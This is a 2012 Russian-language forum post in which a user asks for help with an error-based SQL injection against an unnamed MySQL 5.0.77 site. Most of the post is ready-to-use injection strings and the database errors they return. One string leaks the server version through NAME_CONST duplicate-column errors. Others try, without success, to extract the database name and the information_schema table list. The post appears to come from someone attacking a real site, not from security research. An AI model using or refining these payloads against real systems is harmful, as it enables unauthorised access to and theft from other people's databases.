
15.05.2012, 22:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Есть инжект ErrorBased:
Код:
1'or(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
получаю как и положено:
Код:
Duplicate column name '5.0.77-log'
версия 5.0.77
делаю:
Код:
1'or(select*from(select(name_const(database(),1)),name_const(database(),1))a)and(1)='1
и получаю ошибку в операторе NAME_CONST
Код:
Incorrect arguments to NAME_CONST
что в корне нелогично так как предыдущая команда выполнилась
пробую еще:
Код:
1'or(select*from(select(name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1)),name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1))a)and(1)='1
и та же херь:
Код:
Incorrect arguments to NAME_CONST
что еще можно сделать?
|
|
|